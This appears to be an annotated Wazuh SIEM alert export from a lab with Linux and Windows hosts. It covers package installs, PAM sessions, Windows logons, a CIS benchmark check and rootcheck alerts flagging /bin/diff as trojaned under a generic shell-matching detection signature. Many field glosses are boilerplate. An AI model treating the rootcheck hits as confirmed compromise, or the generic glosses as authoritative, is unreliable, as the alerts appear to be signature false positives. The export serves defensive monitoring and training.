data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-image-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60+1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533418.29798 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:23:38.270570+00:00 server1 sshd[71763]: pam_unix(sshd:session): session closed for user simba The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:23:38.270570+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.dstuser: simba No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533418.30190 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:37 status installed linux-image-6.8.0-58-generic:amd64 6.8.0-58.60+1 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-image-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60+1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533418.30695 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:37 status half-configured linux-tools-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533418.31210 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:37 status installed linux-tools-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533418.31711 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:37 status half-configured linux-modules-extra-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-modules-extra-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Host-based anomaly detection event (rootcheck). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 510 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['ossec', 'rootcheck'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533781.32242 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: Trojaned version of file '/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic). The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: rootcheck Name of the Wazuh decoder that parsed this raw log.
data.title: Trojaned version of file detected. Short title some decoders add – usually informational.
data.file: /bin/diff Generic file path referenced in the log.
location: rootcheck Which log source produced the event (e.g., sysmon, auditd).
rule.description: Host-based anomaly detection event (rootcheck). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 510 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['ossec', 'rootcheck'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533781.32617 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: Trojaned version of file '/usr/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic). The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: rootcheck Name of the Wazuh decoder that parsed this raw log.
data.title: Trojaned version of file detected. Short title some decoders add – usually informational.
data.file: /usr/bin/diff Generic file path referenced in the log.
location: rootcheck Which log source produced the event (e.g., sysmon, auditd).
rule.description: Listened ports status (netstat) changed (new port opened or closed). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 533 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['ossec'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.2.7', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['10.1'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.14', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533785.34367 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:29:45.348195+00:00 server1 login[1202]: PAM unable to dlopen(pam_lastlog.so): /usr/lib/security/pam_lastlog.so: cannot open shared object file: No such file or directory The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: login Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:29:45.348195+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533793.35029 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:29:53.449652+00:00 server1 login[1202]: pam_unix(login:session): session opened for user simba(uid=1000) by simba(uid=0) The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: login Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:29:53.449652+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: simba(uid=1000) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.uid: 0 Numeric user ID – pairs with username when name missing.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533795.35488 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:29:53.669158+00:00 server1 (systemd): pam_unix(systemd-user:session): session opened for user simba(uid=1000) by simba(uid=0) The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: (systemd) Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:29:53.669158+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: simba(uid=1000) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.uid: 0 Numeric user ID – pairs with username when name missing.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enforce password history' is set to '24 or more password(s)'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533879.35952 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26000 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Enforce password history' is set to '24 or more password(s)'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines the number of renewed, unique passwords that have to be associated with a user account before you can reuse an old password. The value for this policy setting must be between 0 and 24 passwords. The default value for Windows Vista is 0 passwords, but the default setting in a domain is 24 passwords. To maintain the effectiveness of this policy setting, use the Minimum password age setting to prevent users from repeatedly changing their password. The recommended state for this setting is: 24 or more password(s). Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Note #2: As of the publication of this benchmark, Microsoft currently has a maximum limit of 24 saved passwords. For more information, please visit Enforce password history (Windows 10) - Windows security | Microsoft Docs Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The longer a user uses the same password, the greater the chance that an attacker can determine the password through brute force attacks. Also, any accounts that may have been compromised will remain exploitable for as long as the password is left unchanged. If password changes are required but password reuse is not prevented, or if users continually reuse a small number of passwords, the effectiveness of a good password policy is greatly reduced. If you specify a low number for this policy setting, users will be able to use the same small number of passwords repeatedly. If you do not also configure the Minimum password age setting, users might repeatedly change their passwords until they can reuse their original password. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to 24 or more password(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Enforce password history Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['net.exe accounts'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'net.exe accounts' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: License activation (slui.exe) failed. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60646 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533881.42181 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 8198 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:43.0293769Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2351 Incremental log record number – handy for timeline order.
data.win.system.processID: 9692 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR Textual severity (INFO, WARNING, ERROR).
data.win.system.message: "License Activation (slui.exe) failed with the following error code:
hr=0x80004005
Command-line arguments:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533881.44501 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:04.3626123Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43449 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS Textual severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533882.51836 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:38:35.2666112Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2353 Incremental log record number – handy for timeline order.
data.win.system.processID: 13324 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-18T16:36:35Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-18T16:36:35Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
